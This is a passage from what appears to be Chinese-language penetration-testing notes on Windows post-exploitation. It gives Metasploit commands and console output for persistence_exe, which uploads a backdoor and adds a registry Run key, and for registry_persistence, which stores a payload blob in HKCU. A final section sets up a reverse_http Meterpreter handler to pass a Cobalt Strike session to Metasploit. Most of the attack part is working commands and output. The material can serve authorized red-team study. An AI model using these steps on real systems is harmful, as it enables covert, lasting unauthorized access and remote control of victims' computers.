| 2541 | Description: 2542 | This Module will upload an executable to a remote host and make it 2543 | Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER 2544 | will start on user login, SYSTEM will start on system boot but 2545 | requires privs. SERVICE will create a new service which will start 2546 | the payload. Again requires privs. 2547 | 2548 | 2549 | 2550 | Module options (post/windows/manage/persistence_exe): 2551 | 2552 | Name Current Setting Required Description 2553 | ---- --------------- -------- ----------- 2554 | REXENAME default.exe yes The name to call exe on remote system 2555 | REXEPATH yes The remote executable to upload and execute. 2556 | SESSION yes The session to run this module on. 2557 | STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE) 2558 | ``` 2559 | 2560 | 此模块将可执行文件上载到远程主机并进行创建持久性。 2561 | 涉及到四个参数 2562 | 2563 | - REXENAME是拷贝到目标系统中的名字 2564 | - EXEPATH是将要上传的后门在本地的位置 2565 | - SESSION是选择运行此模块的会话 2566 | - STARTUP是启动类型，有USER、SYSTEM、SERVICE这三种取值，USER表示为将在用户登录时启动，SYSTEM表示将在系统启动时启动(需要权限)，SERVICE表示将创建一个启动服务项(需要权限)。 2567 | 2568 | 尝试一下： 2569 | 2570 | ```bash 2571 | meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER 2572 | 2573 | [*] Running module against SAUCERMAN 2574 | [*] Reading Payload from file /home/ubuntu/shell.exe 2575 | [+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe 2576 | [*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe 2577 | [+] Agent executed with PID 3684 2578 | [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI 2579 | [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI 2580 | [*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc 2581 | ``` 2582 | 2583 | 4.registry_persistence 2584 | 2585 | 完整路径为exploit/windows/local/registry_persistence 2586 | 2587 | 和第一种方法类似，此模块将会安装一个payload到注册表的启动项中。 2588 | 2589 | ```bash 2590 | meterpreter > background 2591 | [*] Backgrounding session 13... 2592 | msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence 2593 | msf5 exploit(windows/local/registry_persistence) > show options 2594 | 2595 | Module options (exploit/windows/local/registry_persistence): 2596 | 2597 | Name Current Setting Required Description 2598 | ---- --------------- -------- ----------- 2599 | BLOB_REG_KEY no The registry key to use for storing the payload blob. (Default: random) 2600 | BLOB_REG_NAME no The name to use for storing the payload blob. (Default: random) 2601 | CREATE_RC true no Create a resource file for cleanup 2602 | RUN_NAME no The name to use for the 'Run' key. (Default: random) 2603 | SESSION yes The session to run this module on. 2604 | SLEEP_TIME 0 no Amount of time to sleep (in seconds) before executing payload. (Default: 0) 2605 | STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM) 2606 | 2607 | 2608 | Exploit target: 2609 | 2610 | Id Name 2611 | -- ---- 2612 | 0 Automatic 2613 | 2614 | 2615 | msf5 exploit(windows/local/registry_persistence) > set SESSION 13 2616 | SESSION => 13 2617 | msf5 exploit(windows/local/registry_persistence) > run 2618 | 2619 | [*] Generating payload blob.. 2620 | [+] Generated payload, 6048 bytes 2621 | [*] Root path is HKCU 2622 | [*] Installing payload blob.. 2623 | [+] Created registry key HKCU\Software\0BaG3zDR 2624 | [+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD 2625 | [*] Installing run key 2626 | [+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB 2627 | [*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc 2628 | ``` 2629 | 2630 | 同类型的还有其他payload，如exploit/windows/local/vss_persistence，exploit/windows/local/s4u_persistence。 2631 | 2632 | 2633 | 2634 | # cs大全 2635 | 2636 | cs派生msf 2637 | 2638 | ```bash 2639 | 2640 | msf > use exploit/multi/handler 2641 | msf exploit(handler) > set payload windows/meterpreter/reverse_http 2642 | msf exploit(handler) > set lhost 192.168.0.143 2643 | msf exploit(handler) > set lport 4444 2644 | msf exploit(handler) > exploit 2645 | 2646 | cs创建一个windows/foreign/reverse_http的 Listener 2647 | 然后选中对应机器，右键->Spawn，选择刚刚创建的监听器。 2648 | ``` 2649 | 2650 | 2651 | 2652 | 2653 | --------------------------------------------------------------------------------